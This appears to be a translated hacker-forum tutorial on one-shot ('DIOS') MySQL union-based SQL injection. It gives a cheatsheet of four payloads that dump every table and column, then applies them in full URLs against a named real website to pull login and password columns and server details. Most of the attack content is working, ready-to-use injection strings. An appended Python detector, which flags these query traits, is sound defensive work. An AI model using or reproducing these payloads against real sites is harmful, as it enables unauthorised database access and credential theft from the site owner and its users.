DIOS (Dump In One Shot)

9/07/2019
Edun:

Meaning: we can dump (extract) the contents of the database with a single request.

Brief history:
DIOS was first introduced by Profexer (rdot.org), then developed further by M@dbl00d (Mas fuad-Sec7or team), Zen Javanicus (securityidiots.com), MakMan, and other fellow injectors.

lets croot :D

/*! IMPORTANT: save this somewhere safe */
-------- DIOS cheatsheet ---------

Queries to dump all tables and columns:


======================================
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)


=======================================
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)


=======================================
(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.coLumns )where(@:=concat(@,0x3c6c693e,table_name,0x203a3a20,column_name))),@)be


======================================


(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x203a3a20,2)),@,2))
---------------------------------------

Pick one of the DIOS queries.


target :: http://www.icpconcepts.com/produit.php?id=55

I assume you already know how to find the magic number...

Just replace column 21 (the magic number) with the DIOS query :p

Let's try dumping all tables and columns:

http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),22,23,24,25,26,27,28,29,30--+

-- Result ---



Now that we know the table and column names, dumping (extracting) the data goes like this:

Let's try dumping the columns "id", "login", and "passwd" from the table "connexion".

/*! pay close attention to the part of the query that changes. */

http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,(select(@x)from(select(@x:=0x00),(select(0)from(connexion)where(@x:=concat+(@x,0x3c62723e,id,0x203a3a20,login,0x203a3a20,passwd))))x),22,23,24,25,26,27,28,29,30--+

--Result--



#Nb

You can modify the query :D
Add HTML tags or SQL commands inside concat().

Example:
http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(0x3c666f6e7420636f6c6f723d626c75653e4d522e3534314e542d3344554e543c2f666f6e743e,0x3c62723e4461746162617365203a3a20,database(),0x3c62723e4d7953514c2056657273696f6e203a3a20,version(),0x3c62723e43757272656e742055736572203a3a20,user(),0x3c62723e2053796d6c696e6b203a3a20,@@Global.have_symlink,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),22,23,24,25,26,27,28,29,30--+

Explanation:
We can insert HTML tags during the injection, such as <font> and so on, provided they are converted to hex and then prefixed with 0x.
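
A defender's view of the hex encoding described above, as an added example that is not part of the original post: a Python check for logged query strings that URL-decodes the value, flags the traits the DIOS queries on this page share (`@x:=` accumulation, `information_schema`, `union select`, `make_set`/`export_set`), and decodes `0x...` literals so the hidden HTML markers become readable. The function names, the alert rule and the sample query strings are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# MySQL hex literal: 0x followed by whole bytes (pairs of hex digits).
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)")

# Traits shared by the DIOS queries shown on this page.
SIGNATURES = {
    "user_variable_assignment": re.compile(r"@\w*\s*:="),
    "information_schema": re.compile(r"information_schema\s*\.", re.I),
    "union_select": re.compile(r"union\s+(?:all\s+)?select", re.I),
    "set_builder_function": re.compile(r"\b(?:make_set|export_set)\s*\(", re.I),
}

# Constructed sample query strings (not taken from real logs).
SAMPLE_QUERIES = [
    "id=55",
    "id=-1+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from"
    "(information_schema.columns)where(0x00)in(@x:=concat(@x,0x3c62723e,"
    "table_name,0x203a3a20,column_name))))x),3--+",
]

def decode_hex_literals(text):
    """Replace each 0x.. literal with the quoted text it encodes."""
    def repl(match):
        raw = bytes.fromhex(match.group(1))
        return repr(raw.decode("latin-1"))  # latin-1 never fails on any byte
    return HEX_LITERAL.sub(repl, text)

def inspect_query_string(raw_query):
    """Return (sorted signature names, decoded query) for one query string."""
    decoded = unquote_plus(raw_query)  # '+' and %xx back to plain characters
    hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))
    return hits, decode_hex_literals(decoded)

def is_suspicious(raw_query):
    """Assumed alert rule: variable accumulation plus at least one other trait."""
    hits, _ = inspect_query_string(raw_query)
    return "user_variable_assignment" in hits and len(hits) >= 2

if __name__ == "__main__":
    for query in SAMPLE_QUERIES:
        hits, readable = inspect_query_string(query)
        print(is_suspicious(query), hits, readable)
```

The underlying fix remains a parameterized query for the `id` parameter; a check like this only helps find requests that already reached the application.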


Source : SBH
